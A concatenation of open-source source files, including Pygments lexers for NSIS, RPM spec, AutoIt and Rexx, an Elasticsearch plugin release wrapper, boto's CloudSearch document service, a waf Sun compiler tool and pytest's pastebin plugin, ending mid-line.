r'PLUGINSDIR|PRINTHOOD|PROFILE|PROGRAMFILES(?:32|64)|QUICKLAUNCH|' r'RECENT|RESOURCES(?:_LOCALIZED)?|SENDTO|SM(?:PROGRAMS|STARTUP)|' r'STARTMENU|SYSDIR|TEMP(?:LATES)?|VIDEOS|WINDIR|\{NSISDIR\})', Name.Builtin), (r'\$(CMDLINE|INSTDIR|OUTDIR|LANGUAGE)', Name.Variable.Global), (r'\$[a-z_]\w*', Name.Variable), ], 'str_double': [ (r'"', String, '#pop'), (r'\$(\\[nrt"]|\$)', String.Escape), include('interpol'), (r'.', String.Double), ], 'str_backtick': [ (r'`', String, '#pop'), (r'\$(\\[nrt"]|\$)', String.Escape), include('interpol'), (r'.', String.Double), ], } class RPMSpecLexer(RegexLexer): """ For RPM *.spec files *New in Pygments 1.6.* """ name = 'RPMSpec' aliases = ['spec'] filenames = ['*.spec'] mimetypes = ['text/x-rpm-spec'] _directives = ('(?:package|prep|build|install|clean|check|pre[a-z]*|' 'post[a-z]*|trigger[a-z]*|files)') tokens = { 'root': [ (r'#.*\n', Comment), include('basic'), ], 'description': [ (r'^(%' + _directives + ')(.*)$', bygroups(Name.Decorator, Text), '#pop'), (r'\n', Text), (r'.', Text), ], 'changelog': [ (r'\*.*\n', Generic.Subheading), (r'^(%' + _directives + ')(.*)$', bygroups(Name.Decorator, Text), '#pop'), (r'\n', Text), (r'.', Text), ], 'string': [ (r'"', String.Double, '#pop'), (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), include('interpol'), (r'.', String.Double), ], 'basic': [ include('macro'), (r'(?i)^(Name|Version|Release|Epoch|Summary|Group|License|Packager|' r'Vendor|Icon|URL|Distribution|Prefix|Patch[0-9]*|Source[0-9]*|' r'Requires\(?[a-z]*\)?|[a-z]+Req|Obsoletes|Suggests|Provides|Conflicts|' r'Build[a-z]+|[a-z]+Arch|Auto[a-z]+)(:)(.*)$', bygroups(Generic.Heading, Punctuation, using(this))), (r'^%description', Name.Decorator, 'description'), (r'^%changelog', Name.Decorator, 'changelog'), (r'^(%' + _directives + ')(.*)$', bygroups(Name.Decorator, Text)), (r'%(attr|defattr|dir|doc(?:dir)?|setup|config(?:ure)?|' r'make(?:install)|ghost|patch[0-9]+|find_lang|exclude|verify)', Keyword), include('interpol'), (r"'.*?'", String.Single), (r'"', String.Double, 'string'), (r'.', Text), ], 'macro': [ (r'%define.*\n', Comment.Preproc), (r'%\{\!\?.*%define.*\}', Comment.Preproc), (r'(%(?:if(?:n?arch)?|else(?:if)?|endif))(.*)$', bygroups(Comment.Preproc, Text)), ], 'interpol': [ (r'%\{?__[a-z_]+\}?', Name.Function), (r'%\{?_([a-z_]+dir|[a-z_]+path|prefix)\}?', Keyword.Pseudo), (r'%\{\?[A-Za-z0-9_]+\}', Name.Variable), (r'\$\{?RPM_[A-Z0-9_]+\}?', Name.Variable.Global), (r'%\{[a-zA-Z][a-zA-Z0-9_]+\}', Keyword.Constant), ] } class AutoItLexer(RegexLexer): """ For `AutoIt <http://www.autoitscript.com/site/autoit/>`_ files. AutoIt is a freeware BASIC-like scripting language designed for automating the Windows GUI and general scripting *New in Pygments 1.6.* """ name = 'AutoIt' aliases = ['autoit', 'Autoit'] filenames = ['*.au3'] mimetypes = ['text/x-autoit'] # Keywords, functions, macros from au3.keywords.properties # which can be found in AutoIt installed directory, e.g. # c:\Program Files (x86)\AutoIt3\SciTE\au3.keywords.properties keywords = """\ #include-once #include #endregion #forcedef #forceref #region and byref case continueloop dim do else elseif endfunc endif endselect exit exitloop for func global if local next not or return select step then to until wend while exit""".split() functions = """\ abs acos adlibregister adlibunregister asc ascw asin assign atan autoitsetoption autoitwingettitle autoitwinsettitle beep binary binarylen binarymid binarytostring bitand bitnot bitor bitrotate bitshift bitxor blockinput break call cdtray ceiling chr chrw clipget clipput consoleread consolewrite consolewriteerror controlclick controlcommand controldisable controlenable controlfocus controlgetfocus controlgethandle controlgetpos controlgettext controlhide controllistview controlmove controlsend controlsettext controlshow controltreeview cos dec dircopy dircreate dirgetsize dirmove dirremove dllcall dllcalladdress dllcallbackfree dllcallbackgetptr dllcallbackregister dllclose dllopen dllstructcreate dllstructgetdata dllstructgetptr dllstructgetsize dllstructsetdata drivegetdrive drivegetfilesystem drivegetlabel drivegetserial drivegettype drivemapadd drivemapdel drivemapget drivesetlabel drivespacefree drivespacetotal drivestatus envget envset envupdate eval execute exp filechangedir fileclose filecopy filecreatentfslink filecreateshortcut filedelete fileexists filefindfirstfile filefindnextfile fileflush filegetattrib filegetencoding filegetlongname filegetpos filegetshortcut filegetshortname filegetsize filegettime filegetversion fileinstall filemove fileopen fileopendialog fileread filereadline filerecycle filerecycleempty filesavedialog fileselectfolder filesetattrib filesetpos filesettime filewrite filewriteline floor ftpsetproxy guicreate guictrlcreateavi guictrlcreatebutton guictrlcreatecheckbox guictrlcreatecombo guictrlcreatecontextmenu guictrlcreatedate guictrlcreatedummy guictrlcreateedit guictrlcreategraphic guictrlcreategroup guictrlcreateicon guictrlcreateinput guictrlcreatelabel guictrlcreatelist guictrlcreatelistview guictrlcreatelistviewitem guictrlcreatemenu guictrlcreatemenuitem guictrlcreatemonthcal guictrlcreateobj guictrlcreatepic guictrlcreateprogress guictrlcreateradio guictrlcreateslider guictrlcreatetab guictrlcreatetabitem guictrlcreatetreeview guictrlcreatetreeviewitem guictrlcreateupdown guictrldelete guictrlgethandle guictrlgetstate guictrlread guictrlrecvmsg guictrlregisterlistviewsort guictrlsendmsg guictrlsendtodummy guictrlsetbkcolor guictrlsetcolor guictrlsetcursor guictrlsetdata guictrlsetdefbkcolor guictrlsetdefcolor guictrlsetfont guictrlsetgraphic guictrlsetimage guictrlsetlimit guictrlsetonevent guictrlsetpos guictrlsetresizing guictrlsetstate guictrlsetstyle guictrlsettip guidelete guigetcursorinfo guigetmsg guigetstyle guiregistermsg guisetaccelerators guisetbkcolor guisetcoord guisetcursor guisetfont guisethelp guiseticon guisetonevent guisetstate guisetstyle guistartgroup guiswitch hex hotkeyset httpsetproxy httpsetuseragent hwnd inetclose inetget inetgetinfo inetgetsize inetread inidelete iniread inireadsection inireadsectionnames inirenamesection iniwrite iniwritesection inputbox int isadmin isarray isbinary isbool isdeclared isdllstruct isfloat ishwnd isint iskeyword isnumber isobj isptr isstring log memgetstats mod mouseclick mouseclickdrag mousedown mousegetcursor mousegetpos mousemove mouseup mousewheel msgbox number objcreate objcreateinterface objevent objevent objget objname onautoitexitregister onautoitexitunregister opt ping pixelchecksum pixelgetcolor pixelsearch pluginclose pluginopen processclose processexists processgetstats processlist processsetpriority processwait processwaitclose progressoff progresson progressset ptr random regdelete regenumkey regenumval regread regwrite round run runas runaswait runwait send sendkeepactive seterror setextended shellexecute shellexecutewait shutdown sin sleep soundplay soundsetwavevolume splashimageon splashoff splashtexton sqrt srandom statusbargettext stderrread stdinwrite stdioclose stdoutread string stringaddcr stringcompare stringformat stringfromasciiarray stringinstr stringisalnum stringisalpha stringisascii stringisdigit stringisfloat stringisint stringislower stringisspace stringisupper stringisxdigit stringleft stringlen stringlower stringmid stringregexp stringregexpreplace stringreplace stringright stringsplit stringstripcr stringstripws stringtoasciiarray stringtobinary stringtrimleft stringtrimright stringupper tan tcpaccept tcpclosesocket tcpconnect tcplisten tcpnametoip tcprecv tcpsend tcpshutdown tcpstartup timerdiff timerinit tooltip traycreateitem traycreatemenu traygetmsg trayitemdelete trayitemgethandle trayitemgetstate trayitemgettext trayitemsetonevent trayitemsetstate trayitemsettext traysetclick trayseticon traysetonevent traysetpauseicon traysetstate traysettooltip traytip ubound udpbind udpclosesocket udpopen udprecv udpsend udpshutdown udpstartup vargettype winactivate winactive winclose winexists winflash wingetcaretpos wingetclasslist wingetclientsize wingethandle wingetpos wingetprocess wingetstate wingettext wingettitle winkill winlist winmenuselectitem winminimizeall winminimizeallundo winmove winsetontop winsetstate winsettitle winsettrans winwait winwaitactive winwaitclose winwaitnotactive""".split() macros = """\ @appdatacommondir @appdatadir @autoitexe @autoitpid @autoitversion @autoitx64 @com_eventobj @commonfilesdir @compiled @computername @comspec @cpuarch @cr @crlf @desktopcommondir @desktopdepth @desktopdir @desktopheight @desktoprefresh @desktopwidth @documentscommondir @error @exitcode @exitmethod @extended @favoritescommondir @favoritesdir @gui_ctrlhandle @gui_ctrlid @gui_dragfile @gui_dragid @gui_dropid @gui_winhandle @homedrive @homepath @homeshare @hotkeypressed @hour @ipaddress1 @ipaddress2 @ipaddress3 @ipaddress4 @kblayout @lf @logondnsdomain @logondomain @logonserver @mday @min @mon @msec @muilang @mydocumentsdir @numparams @osarch @osbuild @oslang @osservicepack @ostype @osversion @programfilesdir @programscommondir @programsdir @scriptdir @scriptfullpath @scriptlinenumber @scriptname @sec @startmenucommondir @startmenudir @startupcommondir @startupdir @sw_disable @sw_enable @sw_hide @sw_lock @sw_maximize @sw_minimize @sw_restore @sw_show @sw_showdefault @sw_showmaximized @sw_showminimized @sw_showminnoactive @sw_showna @sw_shownoactivate @sw_shownormal @sw_unlock @systemdir @tab @tempdir @tray_id @trayiconflashing @trayiconvisible @username @userprofiledir @wday @windowsdir @workingdir @yday @year""".split() tokens = { 'root': [ (r';.*\n', Comment.Single), (r'(#comments-start|#cs).*?(#comments-end|#ce)', Comment.Multiline), (r'[\[\]{}(),;]', Punctuation), (r'(and|or|not)\b', Operator.Word), (r'[\$|@][a-zA-Z_][a-zA-Z0-9_]*', Name.Variable), (r'!=|==|:=|\.=|<<|>>|[-~+/*%=<>&^|?:!.]', Operator), include('commands'), include('labels'), include('builtInFunctions'), include('builtInMarcros'), (r'"', String, combined('stringescape', 'dqs')), include('numbers'), (r'[a-zA-Z_#@$][a-zA-Z0-9_#@$]*', Name), (r'\\|\'', Text), (r'\`([\,\%\`abfnrtv\-\+;])', String.Escape), (r'_\n', Text), # Line continuation include('garbage'), ], 'commands': [ (r'(?i)(\s*)(%s)\b' % '|'.join(keywords), bygroups(Text, Name.Builtin)), ], 'builtInFunctions': [ (r'(?i)(%s)\b' % '|'.join(functions), Name.Function), ], 'builtInMarcros': [ (r'(?i)(%s)\b' % '|'.join(macros), Name.Variable.Global), ], 'labels': [ # sendkeys (r'(^\s*)({\S+?})', bygroups(Text, Name.Label)), ], 'numbers': [ (r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?', Number.Float), (r'\d+[eE][+-]?[0-9]+', Number.Float), (r'0\d+', Number.Oct), (r'0[xX][a-fA-F0-9]+', Number.Hex), (r'\d+L', Number.Integer.Long), (r'\d+', Number.Integer) ], 'stringescape': [ (r'\"\"|\`([\,\%\`abfnrtv])', String.Escape), ], 'strings': [ (r'[^"\n]+', String), ], 'dqs': [ (r'"', String, '#pop'), include('strings') ], 'garbage': [ (r'[^\S\n]', Text), ], } class RexxLexer(RegexLexer): """ `Rexx <http://www.rexxinfo.org/>`_ is a scripting language available for a wide range of different platforms with its roots found on mainframe systems. It is popular for I/O- and data based tasks and can act as glue language to bind different applications together. *New in Pygments 1.7.* """ name = 'Rexx' aliases = ['rexx', 'ARexx', 'arexx'] filenames = ['*.rexx', '*.rex', '*.rx', '*.arexx'] mimetypes = ['text/x-rexx'] flags = re.IGNORECASE tokens = { 'root': [ (r'\s', Whitespace), (r'/\*', Comment.Multiline, 'comment'), (r'"', String, 'string_double'), (r"'", String, 'string_single'), (r'[0-9]+(\.[0-9]+)?(e[+-]?[0-9])?', Number), (r'([a-z_][a-z0-9_]*)(\s*)(:)(\s*)(procedure)\b', bygroups(Name.Function, Whitespace, Operator, Whitespace, Keyword.Declaration)), (r'([a-z_][a-z0-9_]*)(\s*)(:)', bygroups(Name.Label, Whitespace, Operator)), include('function'), include('keyword'), include('operator'), (r'[a-z_][a-z0-9_]*', Text), ], 'function': [ (r'(abbrev|abs|address|arg|b2x|bitand|bitor|bitxor|c2d|c2x|' r'center|charin|charout|chars|compare|condition|copies|d2c|' r'd2x|datatype|date|delstr|delword|digits|errortext|form|' r'format|fuzz|insert|lastpos|left|length|linein|lineout|lines|' r'max|min|overlay|pos|queued|random|reverse|right|sign|' r'sourceline|space|stream|strip|substr|subword|symbol|time|' r'trace|translate|trunc|value|verify|word|wordindex|' r'wordlength|wordpos|words|x2b|x2c|x2d|xrange)(\s*)(\()', bygroups(Name.Builtin, Whitespace, Operator)), ], 'keyword': [ (r'(address|arg|by|call|do|drop|else|end|exit|for|forever|if|' r'interpret|iterate|leave|nop|numeric|off|on|options|parse|' r'pull|push|queue|return|say|select|signal|to|then|trace|until|' r'while)\b', Keyword.Reserved), ], 'operator': [ (r'(-|//|/|\(|\)|\*\*|\*|\\<<|\\<|\\==|\\=|\\>>|\\>|\\|\|\||\||' r'&&|&|%|\+|<<=|<<|<=|<>|<|==|=|><|>=|>>=|>>|>|¬<<|¬<|¬==|¬=|' r'¬>>|¬>|¬|\.|,)', Operator), ], 'string_double': [ (r'[^"\n]+', String), (r'""', String), (r'"', String, '#pop'), (r'\n', Text, '#pop'), # Stray linefeed also terminates strings. ], 'string_single': [ (r'[^\'\n]', String), (r'\'\'', String), (r'\'', String, '#pop'), (r'\n', Text, '#pop'), # Stray linefeed also terminates strings. ], 'comment': [ (r'[^*]+', Comment.Multiline), (r'\*/', Comment.Multiline, '#pop'), (r'\*', Comment.Multiline), ] } _c = lambda s: re.compile(s, re.MULTILINE) _ADDRESS_COMMAND_PATTERN = _c(r'^\s*address\s+command\b') _ADDRESS_PATTERN = _c(r'^\s*address\s+') _DO_WHILE_PATTERN = _c(r'^\s*do\s+while\b') _IF_THEN_DO_PATTERN = _c(r'^\s*if\b.+\bthen\s+do\s*$') _PROCEDURE_PATTERN = _c(r'^\s*([a-z_][a-z0-9_]*)(\s*)(:)(\s*)(procedure)\b') _ELSE_DO_PATTERN = _c(r'\belse\s+do\s*$') _PARSE_ARG_PATTERN = _c(r'^\s*parse\s+(upper\s+)?(arg|value)\b') PATTERNS_AND_WEIGHTS = ( (_ADDRESS_COMMAND_PATTERN, 0.2), (_ADDRESS_PATTERN, 0.05), (_DO_WHILE_PATTERN, 0.1), (_ELSE_DO_PATTERN, 0.1), (_IF_THEN_DO_PATTERN, 0.1), (_PROCEDURE_PATTERN, 0.5), (_PARSE_ARG_PATTERN, 0.2), ) def analyse_text(text): """ Check for inital comment and patterns that distinguish Rexx from other C-like languages. """ if re.search(r'/\*\**\s*rexx', text, re.IGNORECASE): # Header matches MVS Rexx requirements, this is certainly a Rexx # script. return 1.0 elif text.startswith('/*'): # Header matches general Rexx requirements; the source code might # still be any language using C comments such as C++, C# or Java. lowerText = text.lower() result = sum(weight for (pattern, weight) in RexxLexer.PATTERNS_AND_WEIGHTS if pattern.search(lowerText)) + 0.01 return min(result, 1.0)
mit
Collaborne/elasticsearch-lang-mvel
dev-tools/release.py
36
4636
# Licensed to Elasticsearch under one or more contributor # license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright # ownership. Elasticsearch licenses this file to you under # the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on # an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, # either express or implied. See the License for the specific # language governing permissions and limitations under the License. import datetime import os import shutil import sys import time import urllib import urllib.request import zipfile from os.path import dirname, abspath """ This tool builds a release from the a given elasticsearch plugin branch. It is basically a wrapper on top of launch_release.py which: - tries to get a more recent version of launch_release.py in ... - download it if needed - launch it passing all arguments to it, like: $ python3 dev_tools/release.py --branch master --publish --remote origin Important options: # Dry run $ python3 dev_tools/release.py # Dry run without tests python3 dev_tools/release.py --skiptests # Release, publish artifacts and announce $ python3 dev_tools/release.py --publish See full documentation in launch_release.py """ env = os.environ # Change this if the source repository for your scripts is at a different location SOURCE_REPO = 'elasticsearch/elasticsearch-plugins-script' # We define that we should download again the script after 1 days SCRIPT_OBSOLETE_DAYS = 1 # We ignore in master.zip file the following files IGNORED_FILES = ['.gitignore', 'README.md'] ROOT_DIR = abspath(os.path.join(abspath(dirname(__file__)), '../')) TARGET_TOOLS_DIR = ROOT_DIR + '/plugin_tools' DEV_TOOLS_DIR = ROOT_DIR + '/dev-tools' BUILD_RELEASE_FILENAME = 'release.zip' BUILD_RELEASE_FILE = TARGET_TOOLS_DIR + '/' + BUILD_RELEASE_FILENAME SOURCE_URL = 'https://github.com/%s/archive/master.zip' % SOURCE_REPO # Download a recent version of the release plugin tool try: os.mkdir(TARGET_TOOLS_DIR) print('directory %s created' % TARGET_TOOLS_DIR) except FileExistsError: pass try: # we check latest update. If we ran an update recently, we # are not going to check it again download = True try: last_download_time = datetime.datetime.fromtimestamp(os.path.getmtime(BUILD_RELEASE_FILE)) if (datetime.datetime.now()-last_download_time).days < SCRIPT_OBSOLETE_DAYS: download = False except FileNotFoundError: pass if download: urllib.request.urlretrieve(SOURCE_URL, BUILD_RELEASE_FILE) with zipfile.ZipFile(BUILD_RELEASE_FILE) as myzip: for member in myzip.infolist(): filename = os.path.basename(member.filename) # skip directories if not filename: continue if filename in IGNORED_FILES: continue # copy file (taken from zipfile's extract) source = myzip.open(member.filename) target = open(os.path.join(TARGET_TOOLS_DIR, filename), "wb") with source, target: shutil.copyfileobj(source, target) # We keep the original date date_time = time.mktime(member.date_time + (0, 0, -1)) os.utime(os.path.join(TARGET_TOOLS_DIR, filename), (date_time, date_time)) print('plugin-tools updated from %s' % SOURCE_URL) except urllib.error.HTTPError: pass # Let see if we need to update the release.py script itself source_time = os.path.getmtime(TARGET_TOOLS_DIR + '/release.py') repo_time = os.path.getmtime(DEV_TOOLS_DIR + '/release.py') if source_time > repo_time: input('release.py needs an update. Press a key to update it...') shutil.copyfile(TARGET_TOOLS_DIR + '/release.py', DEV_TOOLS_DIR + '/release.py') # We can launch the build process try: PYTHON = 'python' # make sure python3 is used if python3 is available # some systems use python 2 as default os.system('python3 --version > /dev/null 2>&1') PYTHON = 'python3' except RuntimeError: pass release_args = '' for x in range(1, len(sys.argv)): release_args += ' ' + sys.argv[x] os.system('%s %s/build_release.py %s' % (PYTHON, TARGET_TOOLS_DIR, release_args))
apache-2.0
wemanuel/smry
server-auth/ls/google-cloud-sdk/platform/gsutil/third_party/boto/boto/cloudsearch2/document.py
136
11630
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/ # Copyright (c) 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # import boto.exception from boto.compat import json import requests import boto from boto.cloudsearchdomain.layer1 import CloudSearchDomainConnection class SearchServiceException(Exception): pass class CommitMismatchError(Exception): # Let's do some extra work and let the user handle errors on his/her own. errors = None class EncodingError(Exception): """ Content sent for Cloud Search indexing was incorrectly encoded. This usually happens when a document is marked as unicode but non-unicode characters are present. """ pass class ContentTooLongError(Exception): """ Content sent for Cloud Search indexing was too long This will usually happen when documents queued for indexing add up to more than the limit allowed per upload batch (5MB) """ pass class DocumentServiceConnection(object): """ A CloudSearch document service. The DocumentServiceConection is used to add, remove and update documents in CloudSearch. Commands are uploaded to CloudSearch in SDF (Search Document Format). To generate an appropriate SDF, use :func:`add` to add or update documents, as well as :func:`delete` to remove documents. Once the set of documents is ready to be index, use :func:`commit` to send the commands to CloudSearch. If there are a lot of documents to index, it may be preferable to split the generation of SDF data and the actual uploading into CloudSearch. Retrieve the current SDF with :func:`get_sdf`. If this file is the uploaded into S3, it can be retrieved back afterwards for upload into CloudSearch using :func:`add_sdf_from_s3`. The SDF is not cleared after a :func:`commit`. If you wish to continue using the DocumentServiceConnection for another batch upload of commands, you will need to :func:`clear_sdf` first to stop the previous batch of commands from being uploaded again. """ def __init__(self, domain=None, endpoint=None): self.domain = domain self.endpoint = endpoint if not self.endpoint: self.endpoint = domain.doc_service_endpoint self.documents_batch = [] self._sdf = None # Copy proxy settings from connection and check if request should be signed self.proxy = {} self.sign_request = False if self.domain and self.domain.layer1: if self.domain.layer1.use_proxy: self.proxy = {'http': self.domain.layer1.get_proxy_url_with_auth()} self.sign_request = getattr(self.domain.layer1, 'sign_request', False) if self.sign_request: # Create a domain connection to send signed requests layer1 = self.domain.layer1 self.domain_connection = CloudSearchDomainConnection( host=self.endpoint, aws_access_key_id=layer1.aws_access_key_id, aws_secret_access_key=layer1.aws_secret_access_key, region=layer1.region, provider=layer1.provider ) def add(self, _id, fields): """ Add a document to be processed by the DocumentService The document will not actually be added until :func:`commit` is called :type _id: string :param _id: A unique ID used to refer to this document. :type fields: dict :param fields: A dictionary of key-value pairs to be uploaded . """ d = {'type': 'add', 'id': _id, 'fields': fields} self.documents_batch.append(d) def delete(self, _id): """ Schedule a document to be removed from the CloudSearch service The document will not actually be scheduled for removal until :func:`commit` is called :type _id: string :param _id: The unique ID of this document. """ d = {'type': 'delete', 'id': _id} self.documents_batch.append(d) def get_sdf(self): """ Generate the working set of documents in Search Data Format (SDF) :rtype: string :returns: JSON-formatted string of the documents in SDF """ return self._sdf if self._sdf else json.dumps(self.documents_batch) def clear_sdf(self): """ Clear the working documents from this DocumentServiceConnection This should be used after :func:`commit` if the connection will be reused for another set of documents. """ self._sdf = None self.documents_batch = [] def add_sdf_from_s3(self, key_obj): """ Load an SDF from S3 Using this method will result in documents added through :func:`add` and :func:`delete` being ignored. :type key_obj: :class:`boto.s3.key.Key` :param key_obj: An S3 key which contains an SDF """ #@todo:: (lucas) would be nice if this could just take an s3://uri..." self._sdf = key_obj.get_contents_as_string() def _commit_with_auth(self, sdf, api_version): return self.domain_connection.upload_documents(sdf, 'application/json') def _commit_without_auth(self, sdf, api_version): url = "http://%s/%s/documents/batch" % (self.endpoint, api_version) # Keep-alive is automatic in a post-1.0 requests world. session = requests.Session() session.proxies = self.proxy adapter = requests.adapters.HTTPAdapter( pool_connections=20, pool_maxsize=50, max_retries=5 ) session.mount('http://', adapter) session.mount('https://', adapter) resp = session.post(url, data=sdf, headers={'Content-Type': 'application/json'}) return resp def commit(self): """ Actually send an SDF to CloudSearch for processing If an SDF file has been explicitly loaded it will be used. Otherwise, documents added through :func:`add` and :func:`delete` will be used. :rtype: :class:`CommitResponse` :returns: A summary of documents added and deleted """ sdf = self.get_sdf() if ': null' in sdf: boto.log.error('null value in sdf detected. This will probably ' 'raise 500 error.') index = sdf.index(': null') boto.log.error(sdf[index - 100:index + 100]) api_version = '2013-01-01' if self.domain and self.domain.layer1: api_version = self.domain.layer1.APIVersion if self.sign_request: r = self._commit_with_auth(sdf, api_version) else: r = self._commit_without_auth(sdf, api_version) return CommitResponse(r, self, sdf, signed_request=self.sign_request) class CommitResponse(object): """Wrapper for response to Cloudsearch document batch commit. :type response: :class:`requests.models.Response` :param response: Response from Cloudsearch /documents/batch API :type doc_service: :class:`boto.cloudsearch2.document.DocumentServiceConnection` :param doc_service: Object containing the documents posted and methods to retry :raises: :class:`boto.exception.BotoServerError` :raises: :class:`boto.cloudsearch2.document.SearchServiceException` :raises: :class:`boto.cloudsearch2.document.EncodingError` :raises: :class:`boto.cloudsearch2.document.ContentTooLongError` """ def __init__(self, response, doc_service, sdf, signed_request=False): self.response = response self.doc_service = doc_service self.sdf = sdf self.signed_request = signed_request if self.signed_request: self.content = response else: _body = response.content.decode('utf-8') try: self.content = json.loads(_body) except: boto.log.error('Error indexing documents.\nResponse Content:\n{0}' '\n\nSDF:\n{1}'.format(_body, self.sdf)) raise boto.exception.BotoServerError(self.response.status_code, '', body=_body) self.status = self.content['status'] if self.status == 'error': self.errors = [e.get('message') for e in self.content.get('errors', [])] for e in self.errors: if "Illegal Unicode character" in e: raise EncodingError("Illegal Unicode character in document") elif e == "The Content-Length is too long": raise ContentTooLongError("Content was too long") else: self.errors = [] self.adds = self.content['adds'] self.deletes = self.content['deletes'] self._check_num_ops('add', self.adds) self._check_num_ops('delete', self.deletes) def _check_num_ops(self, type_, response_num): """Raise exception if number of ops in response doesn't match commit :type type_: str :param type_: Type of commit operation: 'add' or 'delete' :type response_num: int :param response_num: Number of adds or deletes in the response. :raises: :class:`boto.cloudsearch2.document.CommitMismatchError` """ commit_num = len([d for d in self.doc_service.documents_batch if d['type'] == type_]) if response_num != commit_num: if self.signed_request: boto.log.debug(self.response) else: boto.log.debug(self.response.content) # There will always be a commit mismatch error if there is any # errors on cloudsearch. self.errors gets lost when this # CommitMismatchError is raised. Whoever is using boto has no idea # why their commit failed. They can't even notify the user of the # cause by parsing the error messages from amazon. So let's # attach the self.errors to the exceptions if we already spent # time and effort collecting them out of the response. exc = CommitMismatchError( 'Incorrect number of {0}s returned. Commit: {1} Response: {2}' .format(type_, commit_num, response_num) ) exc.errors = self.errors raise exc
apache-2.0
AndrewSmart/audacity
lib-src/lv2/lv2/plugins/eg02-midigate.lv2/waflib/Tools/suncc.py
134
1378
#! /usr/bin/env python # encoding: utf-8 # WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file import os from waflib import Utils from waflib.Tools import ccroot,ar from waflib.Configure import conf @conf def find_scc(conf): v=conf.env cc=None if v['CC']:cc=v['CC'] elif'CC'in conf.environ:cc=conf.environ['CC'] if not cc:cc=conf.find_program('cc',var='CC') if not cc:conf.fatal('Could not find a Sun C compiler') cc=conf.cmd_to_list(cc) try: conf.cmd_and_log(cc+['-flags']) except Exception: conf.fatal('%r is not a Sun compiler'%cc) v['CC']=cc v['CC_NAME']='sun' @conf def scc_common_flags(conf): v=conf.env v['CC_SRC_F']=[] v['CC_TGT_F']=['-c','-o'] if not v['LINK_CC']:v['LINK_CC']=v['CC'] v['CCLNK_SRC_F']='' v['CCLNK_TGT_F']=['-o'] v['CPPPATH_ST']='-I%s' v['DEFINES_ST']='-D%s' v['LIB_ST']='-l%s' v['LIBPATH_ST']='-L%s' v['STLIB_ST']='-l%s' v['STLIBPATH_ST']='-L%s' v['SONAME_ST']='-Wl,-h,%s' v['SHLIB_MARKER']='-Bdynamic' v['STLIB_MARKER']='-Bstatic' v['cprogram_PATTERN']='%s' v['CFLAGS_cshlib']=['-Kpic','-DPIC'] v['LINKFLAGS_cshlib']=['-G'] v['cshlib_PATTERN']='lib%s.so' v['LINKFLAGS_cstlib']=['-Bstatic'] v['cstlib_PATTERN']='lib%s.a' def configure(conf): conf.find_scc() conf.find_ar() conf.scc_common_flags() conf.cc_load_tools() conf.cc_add_flags() conf.link_add_flags()
gpl-2.0
DDEFISHER/servo
tests/wpt/web-platform-tests/tools/pytest/_pytest/pastebin.py
181
3483
""" submit failure or test session information to a pastebin service. """ import pytest import sys import tempfile def pytest_addoption(parser): group = parser.getgroup("terminal reporting") group._addoption('--pastebin', metavar="mode", action='store', dest="pastebin", default=None, choices=['failed', 'all'], help="send failed|all info to bpaste.net pastebin service.") @pytest.hookimpl(trylast=True) def pytest_configure(config): import py if config.option.pastebin == "all": tr = config.pluginmanager.getplugin('terminalreporter') # if no terminal reporter plugin is present, nothing we can do here; # this can happen when this function executes in a slave node # when using pytest-xdist, for example if tr is not None: # pastebin file will be utf-8 encoded binary file config._pastebinfile = tempfile.TemporaryFile('w+b') oldwrite = tr._tw.write def tee_write(s, **kwargs): oldwrite(s, **kwargs) if py.builtin._istext(s): s = s.encode('utf-8') config._pastebinfile.write(s) tr._tw.write = tee_write def pytest_unconfigure(config): if hasattr(config, '_pastebinfile'): # get terminal contents and delete file config._pastebinfile.seek(0) sessionlog = config._pastebinfile.read() config._pastebinfile.close() del config._pastebinfile # undo our patching in the terminal reporter tr = config.pluginmanager.getplugin('terminalreporter') del tr._tw.__dict__['write'] # write summary tr.write_sep("=", "Sending information to Paste Service") pastebinurl = create_new_paste(sessionlog) tr.write_line("pastebin session-log: %s\n" % pastebinurl) def create_new_paste(contents): """ Creates a new paste using bpaste.net service. :contents: paste contents as utf-8 encoded bytes :returns: url to the pasted contents """ import re if sys.version_info < (3, 0): from urllib import urlopen, urlencode else: from urllib.request import urlopen from urllib.parse import urlencode params = { 'code': contents, 'lexer': 'python3' if sys.version_info[0] == 3 else 'python', 'expiry': '1week', } url = 'https://bpaste.net' response = urlopen(url, data=urlencode(params).encode('ascii')).read() m = re.search(r'href="/raw/(\w+)"', response.decode('utf-8')) if m: return '%s/show/%s' % (url, m.group(1)) else: return 'bad response: ' + response def pytest_terminal_summary(terminalreporter): import _pytest.config if terminalreporter.config.option.pastebin != "failed": return tr = terminalreporter if 'failed' in tr.stats: terminalreporter.write_sep("=", "Sending information to Paste Service") for rep in terminalreporter.stats.get('failed'): try: msg = rep.longrepr.reprtraceback.reprentries[-1].reprfileloc except AttributeError: msg = tr._getfailureheadline(rep) tw = _pytest.config.create_terminal_writer(terminalreporter.config, stringio=True) rep.toterminal(tw) s = tw.stringio.getvalue() assert len(s) pastebinurl = create_new_paste(s) tr.write_line("%s --> %s" 